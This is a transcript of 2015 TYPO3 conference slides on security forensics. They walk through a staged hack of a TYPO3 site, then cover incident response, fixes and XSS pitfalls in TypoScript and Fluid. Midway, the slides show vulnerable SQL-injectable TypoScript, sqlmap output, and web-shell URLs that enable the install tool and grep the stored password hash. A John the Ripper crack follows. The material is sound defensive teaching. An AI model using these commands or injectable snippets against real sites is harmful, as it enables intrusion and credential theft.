security forensics - t3dd15
TRANSCRIPT
Inspiring people toshare
TYPO3 Developer Days 2015
Securtiy Forensics
TYPO3 Developer Days 2015
Helmut Hummel <[email protected]>
17.07.2015
Securtiy Forensics
1
Inspiring people toshare
#CertiFUNcation - Brühl 2015
Secure TYPO3
#CertiFUNcation 2015
Agenda• Diary of a Hack
• Pitfalls
• Best Practice
2
Diary of a Hack
3
Diary of a Hack
Day 1 - Implementing a feature
4
Diary of a Hack
5
lib.sqliSimple = CONTENT lib.sqliSimple { table = tt_content select.where.wrap = colPos=| select.where.data = GP:colPos }
Diary of a Hack
6
lib.sqliSearch = CONTENT lib.sqliSearch { table = tt_content select.where.wrap = header like '%|%' select.where.data = GP:search }
Diary of a Hack
Day 2 - Testing the feature
7
Diary of a Hack
8
Diary of a Hack
9
'BE/debug' => '1''FE/debug' => '1''SYS/devIPmask' => '*''SYS/displayErrors' => '1''SYS/sqlDebug' => '1''SYS/exceptionalErrors' => '28674'
Diary of a Hack
10
Diary of a Hack
11
'DB/username' => 'root'
Diary of a Hack
12
Diary of a Hack
Day 3 - Distraction
13
Diary of a Hack
14
Diary of a Hack
Day 4 - Attraction
15
Diary of a Hack
16
https://www.google.de/?q=exec_SELECTquery+%22You+have+an+error+in+your+SQL+syntax%22
Diary of a Hack
Day 5 - Exploitation
17
Disclaimer
18
Don’t do this at home!
19
Diary of a Hack
20
$ sqlmap -u 'http://security.dev/insecurity/?colPos=0' -p 'colPos'!GET parameter 'colPos' is vulnerable. Do you want to keep testing the others? [y/N] sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
Diary of a Hack
21
Diary of a Hack
22
http://security.dev/tmpbrsru.php?cmd=touch%20typo3conf/ENABLE_INSTALL_TOOL!http://security.dev/typo3/sysext/install/Start/Install.php!http://security.dev/tmpbrsru.php?cmd=grep%20installToolPassword%20typo3conf/LocalConfiguration.php
Diary of a Hack
23
$ john pwLoaded 1 password hash (phpass MD5 [128/128 SSE2 intrinsics 4x4x5])password (dummy)guesses: 1 time: 0:00:00:01 DONE (Thu Jun 4 11:00:44 2015) c/s: 900 trying: 123456 - fishing
Diary of a Hack
24
Diary of a Hack
Day 5 - Discovery
25
Diary of a Hack
Discovery• Take site offline!
• seriously
• I mean it
26
27
Diary of a Hack
Day 6 - Analysis
28
Diary of a Hack
Analysis• Make a backup of current state (files, DB)
• Search all logs for „suspicious“ entries
• Try to reproduce assumed entry points
• If in doubt: get help
29
Diary of a Hack
Day 7 - Fix
30
Diary of a Hack
31
lib.sqliSimple = CONTENT lib.sqliSimple { table = tt_content select.where = colPos=###colPos### select.markers { colPos.data = GP:colPos } }
Diary of a Hack
32
lib.sqliSearch = CONTENT lib.sqliSearch { table = tt_content select.where = header like ###search### select.markers { search.data = GP:search search.wrap = %|% } }
Diary of a Hack
Fix• Close security issue in Code/ Extension/ Core
• Restore from backup
• Or if you really know what you are doing: cleanup installation
• Go online again
• Plan improvements (education, monitoring, …)
33
Inspiring people toshare
TYPO3 Developer Days 2015
Securtiy Forensics
Further Pitfalls
35
Inspiring people toshare
TYPO3 Developer Days 2015
Securtiy Forensics 36
Secure TYPO3
Types of Security Threats• Information disclosure
• SQL injection
• Cross Site Scripting (XSS)
• http://docs.typo3.org/typo3cms/SecurityGuide/TypesOfThreats/Index.html
• https://www.owasp.org/index.php/Category:Attack
37
Inspiring people toshare
TYPO3 Developer Days 2015
Securtiy Forensics
TypoScript
38
page.10 = TEXT page.10.field = title page.10.wrap = <h1 class="c-{field:layout}">|</h1> page.10.insertData = 1
39
page.10 = TEXT # title can contain: {DB:be_users:1:password} page.10.field = title page.10.wrap = <h1 class="c-{field:layout}">|</h1> page.10.insertData = 1
40
page.10 = TEXT page.10.field = title page.10.wrap = <h1 class="c-{field:layout}">|</h1> page.10.insertData = 1
41
page.10 = TEXT page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>
42
page.10 = TEXT # title can contain HTML page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>
43
page.10 = TEXT page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1> page.10.htmlSpecialChars = 1
44
page.10 = TEXT page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1> page.10.htmlSpecialChars = 1
45
page.10 = TEXT # Avoid dataWrap or insertData if possible # layout field might not be safe page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1> page.10.htmlSpecialChars = 1
46
Inspiring people toshare
TYPO3 Developer Days 2015
Securtiy Forensics
Fluid
47
Inspiring people toshare
#CertiFUNcation - Brühl 2015
Secure TYPO3
Extbase
XSS even when using Fluid• Flash Messages
• HTML Context
• Custom View Helpers
48
Inspiring people toshare
TYPO3 Developer Days 2015
Securtiy Forensics
Best Practice
49
Inspiring people toshare
#CertiFUNcation - Brühl 2015
Secure TYPO3
Best Practice• Defined Process
• Regular updates
• Backups
• Monitoring
• Education
• Reserve time for all of the above
• More in: http://docs.typo3.org/typo3cms/SecurityGuide/
50
Questions?
51
Inspiring people toshare
#CertiFUNcation - Brühl 2015
Secure TYPO3
Secure TYPO3 - Diary of a Hack
Resources• http://sqlmap.org
• http://www.openwall.com/john/
• http://docs.typo3.org/typo3cms/SecurityGuide/
• https://www.owasp.org/
52